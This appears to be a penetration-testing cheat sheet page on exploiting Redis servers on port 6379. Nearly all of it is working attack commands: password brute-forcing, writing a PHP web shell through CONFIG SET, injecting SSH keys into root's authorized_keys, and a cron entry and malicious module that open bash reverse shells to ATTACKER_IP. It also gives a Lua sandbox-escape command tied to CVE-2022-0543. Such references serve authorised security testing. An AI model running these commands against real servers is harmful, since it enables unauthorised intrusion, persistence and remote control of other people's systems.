> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 6379 - Redis

> Redis enumeration and exploitation: unauthenticated access, web shell, SSH key injection, and module RCE.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 6379 TARGET
```

***

## Connect

```bash theme={"dark"}
redis-cli -h TARGET
redis-cli -h TARGET -a 'password'
```

### Check Auth Required

```bash theme={"dark"}
redis-cli -h TARGET
> INFO
```

If `NOAUTH` error → password required.

***

## Brute-Force

```bash theme={"dark"}
hydra -P passwords.txt redis://TARGET
nmap -p 6379 --script redis-brute TARGET
```

***

## Enumeration

```bash theme={"dark"}
> INFO
> CONFIG GET *
> CONFIG GET dir
> CONFIG GET dbfilename
> KEYS *
> GET key_name
> SELECT 0           # Switch database
```

***

## Web Shell (If Web Root Known)

```bash theme={"dark"}
> CONFIG SET dir /var/www/html/
> CONFIG SET dbfilename shell.php
> SET payload "<?php system($_GET['cmd']); ?>"
> SAVE
```

Access: `http://TARGET/shell.php?cmd=id`

***

## SSH Key Injection

### Generate Key

```bash theme={"dark"}
ssh-keygen -t ed25519 -f /tmp/redis_key -N ""
(echo -e "\n\n"; cat /tmp/redis_key.pub; echo -e "\n\n") > /tmp/redis_payload.txt
```

### Inject

```bash theme={"dark"}
cat /tmp/redis_payload.txt | redis-cli -h TARGET -x set ssh_key
redis-cli -h TARGET CONFIG SET dir /root/.ssh/
redis-cli -h TARGET CONFIG SET dbfilename authorized_keys
redis-cli -h TARGET SAVE
```

### Connect

```bash theme={"dark"}
ssh -i /tmp/redis_key root@TARGET
```

***

## Cron Job Injection

```bash theme={"dark"}
redis-cli -h TARGET
> CONFIG SET dir /var/spool/cron/crontabs/
> CONFIG SET dbfilename root
> SET cron "\n\n* * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\n\n"
> SAVE
```

***

## Module RCE

Load malicious Redis module for command execution.

```bash theme={"dark"}
# Build
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make
```

```bash theme={"dark"}
# Upload module.so to target
redis-cli -h TARGET MODULE LOAD /path/to/module.so
redis-cli -h TARGET system.exec "id"
redis-cli -h TARGET system.exec "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
```

***

## Lua Script Execution

The Redis Lua sandbox blocks `io`/`os` (only `os.clock`/`os.time` are exposed), so this fails on default Redis. RCE via Lua needs a sandbox-escape bug — e.g. CVE-2022-0543 (Debian/Ubuntu packaging flaw) using `package.loadlib` to reach `liblua`, or CVE-2025-49844.

```bash theme={"dark"}
# Only works against a vulnerable build (e.g. CVE-2022-0543), not default Redis
redis-cli -h TARGET EVAL "return io.popen('id'):read('*a')" 0
```

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 6379 --script redis-info TARGET
nmap -p 6379 --script redis-brute TARGET
```

***

## Quick Reference

| Check      | Command                                                 |
| ---------- | ------------------------------------------------------- |
| Connect    | `redis-cli -h TARGET`                                   |
| Web shell  | `CONFIG SET dir /var/www/html/; SET payload "<?php..."` |
| SSH key    | Inject pub key to `/root/.ssh/authorized_keys`          |
| Cron RCE   | Write to `/var/spool/cron/crontabs/root`                |
| Module RCE | `MODULE LOAD module.so; system.exec "cmd"`              |
